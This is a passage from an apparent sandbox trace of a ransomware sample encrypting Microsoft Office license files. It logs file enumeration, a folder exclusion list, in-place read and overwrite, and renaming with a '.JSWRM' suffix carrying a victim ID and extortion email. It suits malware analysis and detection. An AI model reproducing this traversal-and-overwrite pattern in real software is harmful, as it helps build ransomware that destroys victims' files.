dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0105.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0105.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0105.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0105.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0105.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.635] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial4-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial4-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial4-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0105.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0105.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0105.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.636] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c6ae0b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6c6ae0b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6e34a2d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", cAlternateFileName="O3749E~1.XRM")) returned 1 [0105.636] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.636] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.636] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.636] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.636] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.636] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.636] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.636] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.636] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.636] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0105.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0105.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0105.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0105.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0105.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0105.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0105.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial4-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.637] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11630) returned 1 [0105.637] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0105.637] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0105.640] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.640] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0105.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.641] CloseHandle (hObject=0x45c) returned 1 [0105.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0105.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0105.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0105.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0105.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0105.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0105.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.641] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial4-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial4-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial4-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0105.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0105.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0105.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.642] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe699614a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe699614a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6bac1fc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_SubTrial5-pl.xrm-ms", cAlternateFileName="O39C21~1.XRM")) returned 1 [0105.642] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-pl.xrm-ms", lpString2=".") returned 1 [0105.642] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-pl.xrm-ms", lpString2="..") returned 1 [0105.642] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-pl.xrm-ms", lpString2="...") returned 1 [0105.642] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-pl.xrm-ms", lpString2="windows") returned -1 [0105.642] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-pl.xrm-ms", lpString2="recovery") returned -1 [0105.643] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.643] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.643] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.643] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.643] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-pl.xrm-ms", lpString2="msocache") returned 1 [0105.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0105.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial5-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0105.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial5-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial5-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0105.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0105.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0105.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial5-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0105.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial5-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial5-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0105.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0105.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0105.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0105.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0105.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial5-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial5-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.644] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11179) returned 1 [0105.644] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0105.644] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0105.647] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.647] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0105.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.647] CloseHandle (hObject=0x45c) returned 1 [0105.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0105.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0105.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0105.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0105.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0105.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0105.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.648] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial5-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial5-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial5-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial5-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0105.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0105.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0105.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.649] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c6ae0b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6c6ae0b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6e0e778, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5f31, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_SubTrial5-ppd.xrm-ms", cAlternateFileName="O33C0D~1.XRM")) returned 1 [0105.655] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ppd.xrm-ms", lpString2=".") returned 1 [0105.655] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ppd.xrm-ms", lpString2="..") returned 1 [0105.655] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ppd.xrm-ms", lpString2="...") returned 1 [0105.655] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ppd.xrm-ms", lpString2="windows") returned -1 [0105.655] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.656] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.656] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.656] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.656] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.656] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0105.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial5-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0105.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial5-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial5-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0105.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0105.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0105.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial5-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0105.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial5-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial5-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0105.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0105.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0105.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0105.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0105.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial5-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial5-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.657] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: 